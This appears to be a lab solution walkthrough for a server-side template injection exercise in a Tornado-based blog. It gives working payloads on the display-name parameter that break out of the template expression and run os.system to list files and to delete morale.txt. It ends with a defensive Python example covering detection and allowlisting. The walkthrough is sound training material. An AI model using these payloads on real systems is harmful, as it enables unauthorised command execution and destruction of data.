Lab Solution: Basic server-side template injection (code context)

We have a hint:

Tip: Take a closer look at the “preferred name” functionality.

This function lives on the “My account” page and changes the name displayed when we comment on a post.

Click the “Submit” button and intercept the request with Burp Suite; we can then change the value of the “blog-post-author-display” parameter (normally one of the radio-button values such as user.name).

For example, use payload:

blog-post-author-display=7*7

Our displayed name on the next comment becomes “49”. That confirms the parameter is evaluated as template code: the server places the value inside its own {{ }} expression, so 7*7 is rendered as {{7*7}}.

This lab uses a Tornado template, so we can use Python to run system commands. The first }} in the payload closes the server's own expression, the {% import os %} block is Tornado's syntax for an import, and the trailing }} is supplied by the template itself; the + characters are URL-encoded spaces in the form body. Note that os.system() returns the command's exit status rather than its output, so the rendered name shows 0 instead of the directory listing; that is enough here because the goal is to delete a file, not to read output.

To list the files, we use:

blog-post-author-display=user.name}}{%+import+os+%}{{os.system('ls')

And to delete the file, we use:

blog-post-author-display=user.name}}{%+import+os+%}{{os.system('rm+morale.txt')
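To make the code-context mechanism concrete, here is an added example (not the lab's own server code) that shows the template source a vulnerable handler would hand to Tornado for each payload above, beside a hardened handler that treats the parameter as a selector rather than as template code. The User fields and the three allowed selector values are assumptions about the lab's radio buttons.

```python
import html
from dataclasses import dataclass


# Assumed shape of the lab's user object (example only).
@dataclass
class User:
    name: str
    first_name: str
    nickname: str


# Assumed allowlist: the values the "preferred name" radio buttons submit.
ALLOWED_FIELDS = {"user.name", "user.first_name", "user.nickname"}


def vulnerable_template_source(display_field: str) -> str:
    """Template source built the vulnerable way: the raw parameter is
    spliced into the Tornado template text between {{ and }}.  Whatever
    the attacker sends becomes template *code*, which is why 7*7 renders
    as 49 and why a leading }} lets the attacker close the expression and
    open {% import os %} / {{ os.system(...) }} blocks of their own."""
    return '<p class="author">{{' + display_field + '}}</p>'


def looks_like_breakout(display_field: str) -> bool:
    """Cheap detection check for logs or a WAF rule: a legitimate selector
    never contains template delimiters.  This is a signal, not the fix."""
    return any(token in display_field for token in ("{{", "}}", "{%", "%}"))


def accepts(display_field: str) -> bool:
    """The real fix: only allowlisted selectors are accepted."""
    return display_field in ALLOWED_FIELDS


def render_author_safe(display_field: str, user: User) -> str:
    """Hardened handler: the parameter chooses an attribute from the
    allowlist and is never compiled by the template engine; the chosen
    value is HTML-escaped before it reaches the page."""
    if not accepts(display_field):
        raise ValueError(f"rejected display field: {display_field!r}")
    attr = display_field.split(".", 1)[1]  # "user.name" -> "name"
    return '<p class="author">' + html.escape(getattr(user, attr)) + "</p>"


if __name__ == "__main__":
    payloads = [
        "user.name",
        "7*7",
        "user.name}}{% import os %}{{os.system('ls')",
        "user.name}}{% import os %}{{os.system('rm morale.txt')",
    ]
    wiener = User(name="wiener", first_name="Peter", nickname="peter")
    for p in payloads:
        print("payload:           ", p)
        print("vulnerable source: ", vulnerable_template_source(p))
        print("breakout detected: ", looks_like_breakout(p))
        print("hardened result:   ",
              render_author_safe(p, wiener) if accepts(p) else "rejected")
        print()
```

The vulnerable function never calls Tornado itself; it only shows the exact source string the engine would compile, which is where the attacker's }} and {% %} tokens take effect. The hardened version removes the problem entirely by never letting user input reach the template compiler.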
